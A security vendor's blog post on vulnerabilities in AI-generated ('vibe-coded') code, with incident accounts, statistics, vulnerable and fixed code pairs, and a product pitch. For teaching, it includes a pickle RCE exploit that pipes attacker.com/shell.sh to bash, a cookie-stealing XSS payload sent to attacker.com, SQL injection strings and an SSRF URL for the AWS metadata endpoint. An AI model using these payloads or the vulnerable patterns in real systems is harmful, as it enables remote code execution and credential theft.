35 CVEs in March Alone. Real Exploits. Real Breaches. And Your AI Assistant Has No Idea.
By the Security Research Team at Precogs.ai — March 2026
"A year ago, most developers used AI for autocomplete. Now people are vibe coding entire projects, shipping code they've barely read. That's a different risk profile entirely."
— Hanqing Zhao, Georgia Tech SSLab, March 2026
Vibe coding is the most significant shift in software development in a generation. It is also, right now, producing a measurable, accelerating wave of exploitable vulnerabilities that are reaching production systems faster than any security team can track.
The numbers are no longer theoretical. In March 2026 alone, at least 35 new CVE entries were disclosed that were the direct result of AI-generated code — up from 6 in January and 15 in February. Security firm Tenzai tested 5 major AI coding tools by building 3 identical applications with each, and found 69 vulnerabilities across all 15 apps. Every single tool introduced Server-Side Request Forgery vulnerabilities. Zero apps built CSRF protection. Zero apps set security headers. Escape.tech scanned 5,600 publicly deployed vibe-coded applications and found 2,000+ vulnerabilities and 400+ exposed secrets.
This is not a warning about a future risk. This is a post-mortem on a crisis that is already happening — with real breaches, real CVEs, and real data sitting exposed on the internet right now because a founder trusted an AI assistant to build something production-safe and no one checked.
This blog is for every developer, security engineer, and engineering leader who is using AI coding tools, shipping AI-generated code, or responsible for a product where either of those is true. Which, in 2026, is nearly everyone.
Table of Contents
- What Is Vibe Coding — And Why Is It a Security Problem Now
- The Data: CVE Counts, Breach Numbers, and What They Actually Mean
- The Moltbook Incident: A Real Breach, Built Entirely by AI
- Why AI Tools Generate Insecure Code — The Structural Reasons
- The Pickle RCE: When a Snake Game Becomes a Backdoor
- Injection Flaws in AI-Generated Code: The Classics Never Die
- Broken Authentication and Authorization: The Most Common AI Failure
- The Hallucinated Package Problem: Supply Chain Attacks by Proxy
- Missing Security Headers: The Invisible Defaults
- SSRF in Every App: The 100% Failure Rate
- Business Logic Gaps: What AI Can Never Know
- The Amazon Incident: When Vibe Coding Hits Production at Scale
- How to Prompt Your AI for Secure Code
- How Precogs.ai Catches What Your AI Assistant Ships
- A Secure Vibe Coding Workflow
- Conclusion: The Vibe Is Not the Problem. The Gap Is.
1. What Is Vibe Coding — And Why Is It a Security Problem Now
When Andrej Karpathy coined the term "vibe coding" in February 2025, he described a state where developers "fully give in to the vibes" — describing what they want in natural language, accepting whatever the LLM generates, and shipping without deep review. Collins English Dictionary named it Word of the Year. Within 18 months it had moved from a curiosity to the dominant development paradigm for a significant fraction of the software being shipped in 2026.
The workflow is seductive in its simplicity:
Prompt: "Build me a REST API for a SaaS app with user registration,
login, subscription management via Stripe, and a dashboard
showing usage metrics. Use FastAPI and PostgreSQL."
→ AI generates ~2,000 lines of code in 30 seconds
→ Developer reviews: "Looks good, tests pass"
→ Code ships to production
The problem is not the speed. The problem is the gap between "tests pass" and "is secure." These are not the same thing — and AI coding tools generate entire applications from scratch in a black box: you don't see how the model weighs different implementation choices or what assumptions it makes about security. The resulting code routinely bypasses the review and testing workflows that catch these problems in traditional development.
When a human developer writes a login function, every security decision is visible and explicit. When an AI writes it, those decisions are implicit — embedded in training data patterns that optimize for functionality, not security. AI coding tools can reproduce insecure patterns from training data or generate flawed logic under pressure to produce fast results, leading to injection flaws, weak authentication, broken authorization, and unsafe handling of sensitive data.
The shift that makes 2026 different from 2024 is not that AI-generated code became less secure. It is that the scale and autonomy changed. A year ago, developers used AI for autocomplete suggestions. Today, entire projects — authentication systems, payment integrations, database schemas, API layers — are being generated end-to-end and shipped with minimal human review. The risk profile is categorically different.
2. The Data: CVE Counts, Breach Numbers, and What They Actually Mean
Georgia Tech's Systems Software & Security Lab launched the Vibe Security Radar in May 2025 to track exactly this phenomenon. The methodology is rigorous: pull CVEs from public vulnerability databases, find the commit that fixed each vulnerability, trace backwards to find who introduced the bug, and flag it if the introducing commit has an AI tool's signature.
As of March 20, 2026, the CVE scorecard reads 74 CVEs attributable to AI-authored code, out of 43,849 advisories analyzed. In March 2026 alone: 27 CVEs authored by Claude Code, 4 by GitHub Copilot, 2 by Devin, and 1 each by Aether and Cursor.
Claude Code's prominence in these numbers requires context: its overrepresentation appears to follow from its recent surge in popularity and from the fact that it always leaves a signature in the commits it authors. Tools like Copilot's inline suggestions leave no trace at all, so they're far harder to attribute.
The 74 confirmed CVEs are almost certainly a massive undercount. Georgia Tech researcher Hanqing Zhao estimates the real number is likely 5 to 10 times higher than what they currently detect — roughly 400 to 700 cases across the open-source ecosystem. Take OpenClaw as an example: it has more than 300 security advisories and appears to have been heavily vibe-coded, but most AI traces have been stripped away, so the researchers can confidently confirm only around 20 cases with clear AI signals.
Beyond CVEs, the picture from application scanning is even more alarming:
- Carnegie Mellon found that 61% of AI-generated code is functionally correct but only 10.5% is fully secure
- CodeRabbit's December 2025 study found vibe-coded PRs produced 1.7 times more major issues, up to 2.7 times more XSS vulnerabilities, and a 23.5% increase in production incidents per pull request
- Escape.tech discovered 2,000+ vulnerabilities and 400+ exposed secrets in 5,600 publicly deployed vibe-coded applications
3. The Moltbook Incident: A Real Breach, Built Entirely by AI
Theory becomes real with Moltbook — and this case study should be required reading for every founder using vibe coding tools.
In February 2026, Moltbook — a social networking site for AI agents — made international security news. The entire platform had been built through vibe coding. The founder publicly said he wrote zero lines of code himself. Security firm Wiz discovered a misconfigured Supabase database that had been left with public read and write access. The exposure included 1.5 million authentication tokens and 35,000 email addresses — all wide open to the internet.
The root cause was not a sophisticated attack. The AI scaffolded the database with permissive settings during development and the founder — who hadn't reviewed the infrastructure code — deployed it as-is.
This is the accountability gap that defines the vibe coding security crisis. When a vulnerability is found six months later in AI-generated code, there's no author to ask "why did you do it this way?" — because no human made that decision. The AI did. And the AI doesn't document its reasoning.
The specific failure in Moltbook's case was a Supabase Row Level Security configuration:
-- What the AI generated (DANGEROUS default):
-- No RLS policies created. Table accessible to anon role by default.
CREATE TABLE user_sessions (
    id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
    user_id UUID REFERENCES users(id),
    token TEXT NOT NULL,
    created_at TIMESTAMPTZ DEFAULT NOW()
);
-- Supabase's anon key has SELECT access to all tables without RLS policies
-- Result: 1.5 million session tokens readable by anyone with the anon key

-- What it should have looked like:
-- Enable Row Level Security immediately
ALTER TABLE user_sessions ENABLE ROW LEVEL SECURITY;

-- Users can only read their own sessions
CREATE POLICY "Users can view own sessions"
    ON user_sessions FOR SELECT
    USING (auth.uid() = user_id);

-- Service role only for writes
CREATE POLICY "Service role can insert sessions"
    ON user_sessions FOR INSERT
    WITH CHECK (auth.role() = 'service_role');
The AI generated a working session management system. It did not generate a secure one. And without a developer who understood Supabase's security model, the difference was invisible until Wiz's scanner found it.
4. Why AI Tools Generate Insecure Code — The Structural Reasons
Understanding why AI coding tools produce insecure code is essential to knowing where to look for the problems they introduce.
4.1 Training Data Reflects the Internet — Which Is Insecure
AI coding models are trained on vast corpora of public code. The internet is full of tutorials, Stack Overflow answers, and example code that prioritizes getting something working quickly over getting it working securely. Insecure patterns — SQL string concatenation, hardcoded secrets in examples, missing input validation in tutorials — are well-represented in training data. The model learns to produce outputs that look like the code it was trained on.
4.2 Optimization Target Is Functionality, Not Security
Vibe coding optimizes for features, not permissions. Access control is an architectural decision that gets made implicitly by the AI — and those implicit decisions are often wrong. The model is evaluated on "does this code work?" not "is this code secure?" These are different evaluation criteria with different outputs.
4.3 No Business Context
AI has no knowledge of your specific threat model, your user base's risk profile, your regulatory requirements, or your business logic invariants. Because AI lacks an understanding of your specific business logic, it can build applications that technically work but violate domain rules, regulatory requirements, or customer trust.
4.4 Security Is Often Invisible to the Model
Many security properties are defined by what's absent — a missing rate limit, a missing ownership check, a missing CSRF token, a missing security header. AI models are better at generating present things than noticing absent things. The generated code looks complete because it has all the features. The security holes are invisible because there's nothing to see.
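Absence is still mechanically checkable, though — you just have to audit against an explicit expectation rather than read the code. A minimal sketch, using an illustrative (not exhaustive) list of required response headers:

```python
# Illustrative subset of security headers — not a complete policy
REQUIRED_SECURITY_HEADERS = {
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
}

def missing_security_headers(response_headers: dict) -> set[str]:
    """Return the required security headers absent from a response."""
    # Header names are case-insensitive, so normalize before comparing
    present = {name.title() for name in response_headers}
    return {h for h in REQUIRED_SECURITY_HEADERS if h.title() not in present}
```

A check like this in CI turns "nothing to see" into a failing build — which is the general remedy for absence-shaped vulnerabilities.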
4.5 The "Looks Good" Trap
AI-generated code is syntactically clean, well-structured, and passes basic linting. It looks more professional than hastily written human code. This creates a cognitive trap where developers extend more trust to it than it deserves. A messy function written by a junior developer triggers review instincts. A beautifully formatted AI-generated function lulls them to sleep.
5. The Pickle RCE: When a Snake Game Becomes a Backdoor
The Databricks AI Red Team's Snake game experiment is one of the most illustrative examples of how vibe coding produces invisible vulnerabilities.
When they asked Claude to build a multiplayer snake game, the AI-generated network layer used Python's pickle module to serialize and deserialize game objects — a module notorious for enabling arbitrary remote code execution. The app ran perfectly. The vulnerability was invisible to anyone who didn't already know about pickle exploits.
Here is exactly what the AI generated and why it is catastrophic:
# AI-generated multiplayer Snake game network layer
# DANGEROUS: pickle for network serialization
import socket
import pickle
import threading

class GameServer:
    def __init__(self, host='0.0.0.0', port=9999):
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind((host, port))
        self.server.listen(5)
        self.players = {}

    def handle_client(self, conn, addr):
        while True:
            data = conn.recv(4096)
            if not data:
                break
            # CRITICAL VULNERABILITY: Deserializing untrusted network data with pickle
            # Any connected client can send a crafted payload for RCE
            game_state = pickle.loads(data)  # ← Arbitrary code execution here
            self.update_game(game_state)

    def send_state(self, conn, state):
        conn.sendall(pickle.dumps(state))  # ← Also dangerous on the receive side
An attacker who can connect to this game server — which listens on 0.0.0.0, meaning all interfaces — can send a crafted pickle payload:
# Attacker's exploit: craft a malicious pickle payload
import pickle
import os
import socket

class RCEPayload:
    def __reduce__(self):
        # This executes on the SERVER when pickle.loads() is called
        return (os.system, ("curl http://attacker.com/shell.sh | bash",))

# Serialize the malicious payload
malicious_data = pickle.dumps(RCEPayload())

# Send to game server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('target-game-server.com', 9999))
sock.sendall(malicious_data)

# Server executes: curl http://attacker.com/shell.sh | bash
# Full remote code execution achieved
The fix is trivial — use JSON instead of pickle for network serialization:
# SAFE: JSON serialization for network data
import json

class GameServer:
    def handle_client(self, conn, addr):
        while True:
            data = conn.recv(4096)
            if not data:
                break
            try:
                # JSON cannot execute arbitrary code on deserialization
                game_state = json.loads(data.decode('utf-8'))
                # Validate the structure before processing
                if not self._validate_game_state(game_state):
                    continue
                self.update_game(game_state)
            except (json.JSONDecodeError, KeyError, ValueError):
                continue  # Reject malformed input

    def _validate_game_state(self, state: dict) -> bool:
        required_keys = {'player_id', 'direction', 'position'}
        return (
            isinstance(state, dict) and
            required_keys.issubset(state.keys()) and
            state['direction'] in ('up', 'down', 'left', 'right')
        )
The fix was simple — switch from pickle to JSON — but only once the team caught the issue during review. Without that review, a malicious client could have executed arbitrary code on any game server.
This is the vibe coding security gap in its purest form: the AI produced working code. The working code was also a perfect RCE backdoor. A security review caught it. Without that review, it ships.
6. Injection Flaws in AI-Generated Code: The Classics Never Die
Ask a model to generate a login function, and you may receive something syntactically perfect, yet riddled with flaws — from hardcoded credentials to unvalidated inputs. A session cookie without the HttpOnly or Secure flag is an open invitation for hijacking. A dynamic SQL query built from unchecked user input is a textbook example of an injection vulnerability.
6.1 SQL Injection — Still Appearing in AI Code in 2026
# What AI tools frequently generate for search endpoints:
@app.route('/api/search')
def search_users():
    query = request.args.get('q', '')
    # DANGEROUS: String interpolation directly into SQL
    sql = f"SELECT id, name, email FROM users WHERE name LIKE '%{query}%'"
    results = db.execute(sql).fetchall()
    return jsonify([dict(r) for r in results])
Attacker input: q='; DROP TABLE users; --
Result: Table dropped. Or: q=' UNION SELECT id, password_hash, ssn FROM users WHERE '1'='1 — full table dump including password hashes.
# SAFE: Parameterized query — what the AI should have generated
@app.route('/api/search')
def search_users():
    query = request.args.get('q', '')
    # Parameterized — user input never interpreted as SQL
    results = db.execute(
        "SELECT id, name, email FROM users WHERE name LIKE ?",
        (f'%{query}%',)
    ).fetchall()
    return jsonify([dict(r) for r in results])
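The difference is easy to verify in isolation. A self-contained sqlite3 sketch showing that the parameterized form binds the classic payload as a literal search string (sqlite3 also refuses multi-statement `execute`, but parameterization is the defense that holds across drivers):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice', 'a@example.com')")

payload = "'; DROP TABLE users; --"

# Parameterized: the payload is bound as data, never parsed as SQL
rows = conn.execute(
    "SELECT id, name, email FROM users WHERE name LIKE ?",
    (f"%{payload}%",),
).fetchall()
assert rows == []  # No user matches the literal payload string

# The table is still intact — the injection attempt was inert
count = conn.execute("SELECT COUNT(*) FROM users").fetchone()[0]
print(count)  # → 1
```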
6.2 XSS in AI-Generated React Components
// AI-generated component — DANGEROUS: dangerouslySetInnerHTML with user content
function UserProfile({ user }) {
  return (
    <div className="profile">
      <h1>{user.name}</h1>
      {/* AI chose this for "rich text" support — XSS vector */}
      <div dangerouslySetInnerHTML={{ __html: user.bio }} />
    </div>
  );
}
An attacker whose bio is <script>document.cookie='stolen='+document.cookie;fetch('https://attacker.com?c='+document.cookie)</script> now steals every visitor's session cookie.
// SAFE: Sanitize before rendering, or avoid dangerouslySetInnerHTML
import DOMPurify from 'dompurify';

function UserProfile({ user }) {
  // DOMPurify strips all executable content before rendering
  const cleanBio = DOMPurify.sanitize(user.bio);
  return (
    <div className="profile">
      <h1>{user.name}</h1>
      <div dangerouslySetInnerHTML={{ __html: cleanBio }} />
    </div>
  );
}
7. Broken Authentication and Authorization: The Most Common AI Failure
Authorization logic was the most common failure in Tenzai's study. Codex skipped validation for non-shopper roles completely. Claude Code generated code that checked authentication but skipped all permission validation when users weren't logged in, enabling unrestricted product deletion.
This is the distinction between authentication ("are you who you say you are?") and authorization ("are you allowed to do this?") — and AI tools consistently conflate them or skip the latter.
7.1 The Missing Ownership Check
// AI-generated endpoint — DANGEROUS: authenticated but not authorized
app.delete('/api/posts/:id', requireAuth, async (req, res) => {
  // Checks: is the user logged in? ✓
  // Checks: does this user OWN this post? ✗
  const post = await Post.findById(req.params.id);
  if (!post) return res.status(404).json({ error: 'Not found' });
  await post.deleteOne();
  res.json({ success: true });
  // Any authenticated user can delete any post
});
// SAFE: Authentication + authorization
app.delete('/api/posts/:id', requireAuth, async (req, res) => {
  const post = await Post.findOne({
    _id: req.params.id,
    author: req.user.id // Ownership check — only the author can delete
  });
  if (!post) return res.status(404).json({ error: 'Not found' });
  await post.deleteOne();
  res.json({ success: true });
});
7.2 Insecure Session Cookies
# AI-generated Flask session configuration — dangerous defaults
app = Flask(__name__)
app.secret_key = 'dev_secret_key_123'  # Hardcoded weak key

@app.route('/login', methods=['POST'])
def login():
    # ... authentication logic ...
    session['user_id'] = user.id
    return redirect('/')

# Missing: SESSION_COOKIE_SECURE = True    → cookie sent over HTTP (interceptable)
# Missing: SESSION_COOKIE_HTTPONLY = True  → cookie readable by JS (XSS theft)
# Missing: SESSION_COOKIE_SAMESITE = 'Lax' → CSRF vulnerable
# Present: hardcoded weak secret key       → sessions forgeable

# SAFE: Explicit, secure session configuration
import os
from datetime import timedelta

app = Flask(__name__)
app.config.update(
    SECRET_KEY=os.environ['SECRET_KEY'],            # Strong random key from env
    SESSION_COOKIE_SECURE=True,                     # HTTPS only
    SESSION_COOKIE_HTTPONLY=True,                   # No JS access
    SESSION_COOKIE_SAMESITE='Lax',                  # CSRF protection
    PERMANENT_SESSION_LIFETIME=timedelta(hours=24)  # Reasonable expiry
)
7.3 The Business Logic Authorization Gap
Four of five AI tools allowed negative order quantities. Three allowed negative product prices. These aren't obscure edge cases — they're the first thing a human QA tester checks.
# AI-generated order endpoint — business logic flaws
@app.route('/api/orders', methods=['POST'])
@require_auth
def create_order():
    data = request.json
    # AI validates types but not business rules
    quantity = int(data['quantity'])    # Could be -100
    price = float(data['unit_price'])   # Could be -9999.99
    total = quantity * price            # Negative order = store pays you
    order = Order.create(
        user_id=current_user.id,
        quantity=quantity,
        unit_price=price,
        total=total
    )
    charge_stripe(current_user, total)  # Charging -$999? Stripe refunds you.
    return jsonify(order.to_dict())

# SAFE: Enforce business invariants explicitly
@app.route('/api/orders', methods=['POST'])
@require_auth
def create_order():
    data = request.json
    quantity = int(data['quantity'])
    product_id = data['product_id']
    # Business invariants — never trust client-supplied pricing
    if quantity <= 0 or quantity > 1000:
        return jsonify({'error': 'Invalid quantity'}), 400
    # Price comes from the database, not the client
    product = Product.query.get_or_404(product_id)
    if not product.is_available:
        return jsonify({'error': 'Product unavailable'}), 400
    total = quantity * product.price  # Server-authoritative pricing
    order = Order.create(
        user_id=current_user.id,
        quantity=quantity,
        product_id=product_id,
        total=total
    )
    charge_stripe(current_user, total)
    return jsonify(order.to_dict())
8. The Hallucinated Package Problem: Supply Chain Attacks by Proxy
AI models sometimes hallucinate package names. They recommend libraries that sound real but don't exist — or worse, exist but are malicious packages registered to catch exactly this scenario.
This is a supply chain attack enabled by AI without any attacker involvement in the generation step. The attack chain:
- Developer prompts AI: "Add email validation to my Node.js app"
- AI suggests: npm install validator-utils-express (a hallucinated package name)
- Developer runs npm install without checking
- An attacker who registered validator-utils-express on npm last year gets a hit
- The malicious package installs a credential harvester via a postinstall script
# The hallucination scenario — always verify before installing
# Step 1: Before running ANY npm install or pip install from AI suggestions,
# check if the package actually exists and has legitimate history
npm info validator-utils-express           # Does it exist? Who maintains it?
npm info validator-utils-express versions  # How long has it existed?

# For Python:
pip index versions some-suggested-package  # Check publication history

# Step 2: Verify it's the package you expect
# Look for: number of downloads, GitHub repo, publish date, maintainer history

# Step 3: Prefer well-known, highly downloaded packages
# Instead of AI-suggested obscure packages, use:
# - npm: validator (24M weekly downloads, not validator-utils-express)
# - Python: email-validator (well-established, not ai-suggested-email-utils)
Vibe coding tools also tend to leave dependency versions unpinned, which means a compromised update can silently enter a project without any code change on the developer's side. These risks are invisible to application-level security scanners because the vulnerability is in the dependency, not in the code that imports it.
// What AI generates (dangerous):
{
  "dependencies": {
    "express": "^4.18.0",   // ^ means "accept any compatible update"
    "mongoose": "^7.0.0",
    "validator-utils": "*"  // * means "accept anything"
  }
}

// What it should look like after security review:
{
  "dependencies": {
    "express": "4.18.3",    // Exact version pin
    "mongoose": "7.6.3",    // Exact version pin
    "validator": "13.11.0"  // Established package, exact pin
  }
}
9. Missing Security Headers: The Invisible Defaults
Zero of 15 apps built by AI tools set CSP, X-Frame-Options, HSTS, X-Content-Type-Options, or proper CORS. Security headers are purely additive — they require no functional change to the application — yet AI consistently omits them because they are not visible in tests, not required for functionality, and not represented in "build me an app" training examples.
# AI-generated Flask app — no security headers
@app.route('/')
def index():
    return render_template('index.html')
# No HSTS, no CSP, no X-Frame-Options, no referrer policy

# SAFE: Helmet-equivalent for Flask using flask-talisman
from flask_talisman import Talisman

Talisman(app,
    force_https=True,  # HSTS
    strict_transport_security=True,
    strict_transport_security_max_age=31536000,
    content_security_policy={
        'default-src': "'self'",
        'script-src': ["'self'", 'cdn.trusted.com'],
        'style-src': ["'self'", "'unsafe-inline'"],
        'img-src': "'self' data:",
    },
    frame_options='DENY',  # X-Frame-Options: DENY (clickjacking)
    referrer_policy='strict-origin'
)
// For Express: AI generates bare app, add helmet immediately
import helmet from 'helmet';

const app = express();

// One line adds 11 security headers
app.use(helmet({
  contentSecurityPolicy: {
    directives: {
      defaultSrc: ["'self'"],
      scriptSrc: ["'self'"],
      styleSrc: ["'self'", "'unsafe-inline'"],
    }
  },
  hsts: { maxAge: 31536000, includeSubDomains: true },
  frameguard: { action: 'deny' },
  noSniff: true,
  xssFilter: true
}));
10. SSRF in Every App: The 100% Failure Rate
The most alarming single finding from Tenzai's study: every single AI coding tool introduced Server-Side Request Forgery vulnerabilities in a URL preview feature, allowing attackers to invoke requests to arbitrary internal URLs, access internal services, bypass firewalls, and leak credentials.
Five out of five. One hundred percent.
# AI-generated URL preview feature — SSRF in every version tested
@app.route('/api/preview')
@require_auth
def preview_url():
    url = request.args.get('url')
    # DANGEROUS: Fetching user-supplied URLs without any validation
    response = requests.get(url, timeout=5)
    # Attacker sends: url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
    # Result: AWS IAM credentials exfiltrated
    return jsonify({
        'title': extract_title(response.text),
        'description': extract_description(response.text)
    })
# SAFE: Strict URL validation preventing SSRF
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {'http', 'https'}
PRIVATE_RANGES = [
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('169.254.0.0/16'),  # AWS metadata
    ipaddress.ip_network('::1/128'),
    ipaddress.ip_network('fc00::/7'),
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        if parsed.scheme not in ALLOWED_SCHEMES:
            return False
        if not parsed.hostname:
            return False
        # Resolve hostname to IP
        ip_str = socket.gethostbyname(parsed.hostname)
        ip = ipaddress.ip_address(ip_str)
        # Reject private, loopback, and link-local addresses
        for private_range in PRIVATE_RANGES:
            if ip in private_range:
                return False
        return True
    except Exception:
        return False

@app.route('/api/preview')
@require_auth
def preview_url():
    url = request.args.get('url')
    if not is_safe_url(url):
        return jsonify({'error': 'URL not allowed'}), 400
    response = requests.get(url, timeout=5, allow_redirects=False)
    return jsonify({
        'title': extract_title(response.text),
        'description': extract_description(response.text)
    })
11. Business Logic Gaps: What AI Can Never Know
There is a category of vulnerability that no amount of AI improvement will solve — at least not without deep domain context. Business logic vulnerabilities arise from the gap between what the code allows and what the business rules require. The AI has no knowledge of your business rules unless you explicitly specify them.
# AI-generated subscription management — logic gaps everywhere
@app.route('/api/subscribe', methods=['POST'])
@require_auth
def subscribe():
    plan_id = request.json['plan_id']
    plan = Plan.query.get(plan_id)
    # AI creates a working subscription — but misses:
    # - Can this user downgrade mid-cycle? (proration logic)
    # - Can a user have multiple active subscriptions?
    # - What happens if payment fails — immediate cutoff or grace period?
    # - Is this plan available in the user's geographic region?
    # - Is the user already on a trial that would be invalidated?
    # - Are there usage limits that need to be enforced at subscription time?
    subscription = create_stripe_subscription(current_user, plan)
    return jsonify({'subscription_id': subscription.id})
None of these gaps appear as errors. The code works. The business logic is just wrong — and wrong in ways that can be exploited (free access via trial manipulation), that violate regulations (selling restricted plans in restricted regions), or that create financial exposure (proration errors at scale).
The AI doesn't know your business. You have to tell it explicitly, check its output explicitly, and test the edge cases explicitly.
12. The Amazon Incident: When Vibe Coding Hits Production at Scale
The most financially significant vibe coding failure to date was not a startup. It was Amazon.
After mandating 80% weekly usage of its AI coding assistant Kiro, Amazon suffered a six-hour outage that knocked out checkout, login, and product pricing, at an estimated cost of 6.3 million lost orders.
The outage traced to AI-generated infrastructure code that passed all tests in staging but exhibited a race condition under production load — exactly the class of vulnerability that only manifests at scale, under concurrent access patterns that no test environment replicates.
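The bug class is easy to state precisely even without Amazon's code, which is not public. Below is a schematic lost-update race — a check-then-act sequence that behaves correctly when workers run sequentially, as they do in most test suites, and silently loses updates when reads interleave under concurrent load:

```python
import threading

# Schematic lost-update race — NOT Amazon's actual code, just the bug class
inventory = {"widget": 10}

# Two "concurrent" workers both read before either writes (interleaving
# simulated deterministically; under real load it happens intermittently):
read_a = inventory["widget"]       # Worker A reads 10
read_b = inventory["widget"]       # Worker B reads 10 before A writes
inventory["widget"] = read_a - 1   # A writes 9
inventory["widget"] = read_b - 1   # B overwrites with 9 — one sale vanished
assert inventory["widget"] == 9    # Should be 8; sequential tests never see this

# The fix: make the read-modify-write atomic
lock = threading.Lock()
def sell(item: str) -> None:
    with lock:
        inventory[item] -= 1
```

Staging passes because the workers there rarely collide; production at Amazon scale collides constantly. That gap is why race conditions are the canonical "passed all tests" failure.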
The same failure pattern is now emerging in security operations. The National Vulnerability Database has over 30,000 CVEs backlogged. More vulnerable code in production means more alerts. More pressure means more temptation to accept AI-generated triage without review. The feedback loop is self-reinforcing.
If Amazon — with thousands of engineers, world-class SRE practices, and multi-stage deployment pipelines — can suffer a six-hour production outage from vibe-coded infrastructure, the implications for startups and scale-ups shipping AI-generated code with minimal review are severe.
13. How to Prompt Your AI for Secure Code
The good news: prompting techniques such as self-reflection, language-specific prompts, and generic security prompts significantly reduce insecure code generation. The AI is not intentionally producing insecure code. It is following the path of least resistance in its training. You can redirect that path with the right prompts.
Security-First Prompt Templates
❌ WEAK PROMPT:
"Build a user authentication system with JWT tokens"
✅ SECURITY-AWARE PROMPT:
"Build a user authentication system with JWT tokens. Requirements:
- Use bcrypt (rounds=12) for password hashing
- JWT tokens must expire in 15 minutes, use refresh tokens with 7-day expiry
- Refresh tokens must be stored server-side (Redis) and invalidatable
- Rate limit login attempts: 5 per IP per 15 minutes, 10 per account per hour
- All tokens must be transmitted over HTTPS only (set Secure cookie flag)
- HttpOnly and SameSite=Lax on all cookies
- Account lockout after 10 failed attempts with exponential backoff
- Log all authentication events for audit trail
- What are the security risks in your implementation, and how have you mitigated each?"
❌ WEAK PROMPT:
"Add a file upload feature"
✅ SECURITY-AWARE PROMPT:
"Add a file upload feature with these security requirements:
- Whitelist allowed MIME types: image/jpeg, image/png, application/pdf only
- Maximum file size: 10MB
- Validate MIME type from file content (not just extension)
- Store files outside the web root with UUID filenames (no user-supplied names)
- Scan uploads with ClamAV before storing
- Generate pre-signed S3 URLs for access (never serve files directly)
- Explain what path traversal attacks are and how your implementation prevents them"
❌ WEAK PROMPT:
"Create an API endpoint that fetches external URLs for link previews"
✅ SECURITY-AWARE PROMPT:
"Create an API endpoint for link previews. It must prevent SSRF attacks by:
- Validating the URL scheme (https only)
- Resolving the hostname to an IP and rejecting private ranges (RFC1918, loopback, link-local, AWS metadata 169.254.169.254)
- Setting a strict timeout (3 seconds max)
- Following zero redirects
- Explain each SSRF vector your implementation defends against"
The Security Self-Review Prompt
After generating any security-sensitive code, always follow up with:
"Review the code you just generated for the following vulnerability classes
and tell me specifically if any are present:
1. Injection (SQL, NoSQL, command, LDAP)
2. Broken authentication or authorization
3. Sensitive data exposure (logging, API responses, error messages)
4. SSRF or arbitrary URL fetching
5. Insecure deserialization
6. Missing rate limiting
7. Hardcoded credentials or secrets
8. Missing input validation
9. Insecure dependencies
For each class: either confirm it's not present (and explain why),
or identify the specific line and provide the fix."
This forces the model to perform a structured security review of its own output — and significantly improves the security of what it produces.
14. How Precogs.ai Catches What Your AI Assistant Ships
The most important insight from the vibe coding security data is this: the vulnerabilities AI tools produce are not new. They are the same vulnerability classes that have been in the OWASP Top 10 for a decade. SQL injection. Broken access control. Security misconfiguration. Insecure deserialization. SSRF.
What is new is the scale and velocity at which they are being introduced. A single developer using Claude Code can generate 10,000 lines of code per day. A traditional security review process built for human-speed development cannot keep up.
Precogs.ai is built for exactly this environment — AI-native security analysis that operates at the speed of AI-generated code.
14.1 AI-Aware Static Analysis
Precogs.ai's analysis engine is tuned for the specific patterns that AI tools produce — the subtle authorization gaps, the missing ownership checks, the SSRF-enabling URL fetchers, the business logic omissions that scanners built for human-written code were not designed to catch.
When your CI/CD pipeline runs after a Claude Code or Cursor session, Precogs.ai doesn't just check the new code against known vulnerability signatures. It performs inter-procedural data flow analysis — tracing user-controlled input from HTTP endpoints through every transformation to every security-sensitive sink.
# Precogs.ai detects this even when the SSRF is three function calls deep:
import requests

def get_preview_data(url):            # Function 1: entry point
    content = fetch_content(url)      # Function 2: passes url through
    return parse_og_tags(content)     # (parse_og_tags: HTML parsing helper)

def fetch_content(target_url):
    return requests.get(target_url).text   # Function 3: SSRF sink — flagged

# Classic SAST sees three separate functions and misses the connection.
# Precogs.ai traces the taint from user input in get_preview_data()
# through fetch_content() to requests.get() — and flags it with:
#   "User-controlled URL reaches requests.get() without SSRF validation.
#    Attack path: /api/preview → get_preview_data() → fetch_content() → requests.get()"
14.2 Dependency Hallucination Detection
Precogs.ai cross-references every package in your requirements.txt, package.json, and Cargo.toml against:
- Publication age (packages less than 30 days old with no GitHub history are flagged)
- Download velocity (sudden spikes suggesting a squatting campaign)
- Maintainer reputation and transfer history
- Known malicious package databases
- TeamPCP and other active campaign IoC feeds
A newly registered package that the AI suggested but that has no legitimate history gets flagged before you install it.
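To make the heuristics above concrete, here is a minimal sketch of our own construction — the field names are illustrative, not a real registry schema or the Precogs.ai API. It assumes the metadata record has already been fetched and applies three of the signals listed: publication age without a repository, download-velocity spikes, and recent maintainer transfers.

```python
from datetime import datetime, timezone

# Hypothetical heuristics over an already-fetched package metadata record.
# Field names ("published", "repo_url", ...) are our own for illustration.

def flag_suspect_package(meta: dict, now: datetime) -> list:
    reasons = []
    age_days = (now - meta["published"]).days
    if age_days < 30 and not meta.get("repo_url"):
        reasons.append("published <30 days ago with no linked repository")
    # A 50x week-over-week jump is an example threshold for a squatting campaign.
    if meta.get("weekly_downloads", 0) > 50 * max(meta.get("prev_weekly_downloads", 1), 1):
        reasons.append("sudden download spike (possible squatting campaign)")
    if meta.get("maintainer_transferred_recently"):
        reasons.append("recent maintainer transfer")
    return reasons
```

A package that trips any of these is held for review before installation, which is cheap insurance against the hallucinated-dependency attack: the attacker's registered package is, by construction, brand new and history-free.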
14.3 Business Logic Baseline Modeling
Precogs.ai builds a model of your application's access control patterns — which endpoints check ownership, which roles can access which resources, which numeric fields have business-rule validations. When new AI-generated code is added that creates an endpoint matching the pattern of existing endpoints but missing the authorization checks that existing endpoints have, it is flagged as a likely authorization gap.
